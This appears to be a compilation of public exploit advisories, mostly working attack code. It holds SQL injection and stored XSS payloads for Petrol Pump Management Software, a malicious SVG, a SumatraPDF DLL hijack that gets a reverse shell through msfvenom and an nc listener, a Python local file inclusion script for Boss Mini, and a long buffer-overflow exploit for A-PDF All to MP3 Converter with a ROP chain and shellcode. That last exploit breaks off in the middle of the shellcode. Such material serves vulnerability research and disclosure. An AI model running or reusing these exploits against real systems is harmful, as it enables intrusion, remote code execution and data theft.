Petrol Pump Management Software version 1.0 suffers from a remote SQL injectionvulnerability.

    # Exploit Title: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0.# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27746# Description: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the email address parameter in the index.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with username: test@test.com';SELECT SLEEP(10)# andPassword=test3. Page will load for 10 seconds because of time-based sql injection# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27746

Petrol Pump Management Software 1.0 SQL Injection

Petrol Pump Management Software version 1.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27743# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the Address parameter in the add_invoices.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"4. Fill the payload "<script>alert(0)</script>" in "Address" field5. Stored XSS will be present in "http://localhost/fuelflow/admin/manage_invoices.php" page# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27743-----# Exploit Title: Cross Site Scripting vulnerability via SVG in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27744# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the xss.svg file in "Image" field5. Stored XSS will be present in "http://localhost/fuelflow/assets/images/xss.svg" page6. The content of the xss.svg file is given below:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"stroke="#004400"/>  <script type="text/javascript">    alert("XSS by Shubham Pandey");  </script></svg># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27744

Petrol Pump Management Software 1.0 Cross Site Scripting

SumatraPDF version 3.5.2 suffers from a DLL hijacking vulnerability using CRYPTBASE.DLL. DLL hijacking in this version was already discovered by Ravishanka Silva in February of 2024 but the findings did not include this DLL.

    SumatraPDF 3.5.2 DLL Hijack# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack# Date: 03.03.2024# Exploit Author: Krishna Vamshi Katta Rokkaiah# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 11# CVE : CVE-2024-25884Description:In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.Proof of Concept:1. Use MSFVenom to create a malicious DLL:msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL2. Copy this file to the Sumatra PDF installation folder:C:\Users\<username>\AppData\Local\SumatraPDF\3. Start a listener in attacking system:nc -nlvp 77774. Start the Sumatra PDF application and notice a reverse shell in the attacking system.Demo:https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view

SumatraPDF 3.5.2 DLL Hijacking

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Boss Mini 1.4.0 Local File Inclusion

A-PDF All to MP3 Converter version 2.0.0 overflow exploit with DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain.

    #!/usr/bin/python# Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain# Date: 16 November 2023# Exploit Author: George Washington# Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm# Version: 2.0.0# Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64# Based on: https://www.exploit-db.com/exploits/17275# Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe# Video: https://youtu.be/_JEgdKjbtpIimport socket, structfile = "1.wav"size = 8000############ Parameters for HeapCreate() ############EXE = b"ZZZZ"                          # HeapCreate()EXE += b"AAAA"                         # RETEXE += struct.pack("<I", 0x00040000)   # Parameter 1 0x00040000EXE += struct.pack("<I", 0x00000000)   # Parameter 2 0x00000000EXE += struct.pack("<I", 0x00000000)   # Parameter 3 0x00000000EXE += b"YYYY"                         # HeapAlloc()EXE += b"BBBB"                         # RETEXE += b"CCCC"                         # Parameter 1 hHandleEXE += struct.pack("<I", 0x00000008)   # Parameter 2 0x00000008EXE += struct.pack("<I", 0x00000500)   # Parameter 3 0x00000500EXE += struct.pack("<I", 0x1002dd98)   # _memcpy_s()EXE += b"DDDD"                         # heap pointerEXE += b"EEEE"                         # heap pointerEXE += struct.pack("<I", 0x00000500)   # sizeEXE += b"GGGG"                         # shellcode pointerEXE += struct.pack("<I", 0x00000500)   # sizejunk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1#######################      STACK PIVOT      ###########################SEH = struct.pack("<I", 0x005CE870) # 0x005CE870  add esp 0x800, 4 pops, ret [alltomp3.exe]#######################    1. Get Stack Pointer to point to ZZZZ    ###########################ROP = struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xffffff1c)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to ZZZZ#######################    2. Get and set ZZZZ to HeapCreate        ###########################ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += b"A" * 0x10ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IATROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += struct.pack("<I", 0x41414141)# eax has HeapCreateROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    3. Set RET                               ###########################ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1001939e)  # 0x1001939e: add esp, 0x000001A0 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** #######################    4. Go to HeapCreate                      ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffea4)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret  ;  (1 found) // pad it# when heap create finishes, eax will have hHeapROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    5. Get Stack Pointer to point to YYYY    ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffe58)ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*3ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to YYYY#######################    6. Get and set YYYY to HeapAlloc        ###########################ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += b"A" * 0x10ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IATROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += struct.pack("<I", 0x41414141)# eax has HeapCreateROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    7. Set RET                               ###########################ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)ROP += struct.pack("<I", 0x10014d32)  # 0x10014d32: add esp, 0x00000280 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    8. Set hHEAP                             ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found) <- should return here and start executing hereROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** #######################    9. Go to HeapAlloc                      ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffdcc)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)# when heap create finishes, eax will have hHeapROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret  ;  (1 found) // pad itROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    10. Get Stack Pointer to point to DDDD   ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffd5c)ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*3ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to DDDD#######################    12. Set RET                              ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += b"A"*0x10ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    13. DESTIN                                ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]* #######################    14. SOURCE                                ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0x000000a0)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    15. GOTO _memcpy_s                        ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffc94)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)#######################  SHELLCODE  ###########################shellcode = b"\xcc" * 400real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"real_shellcode += 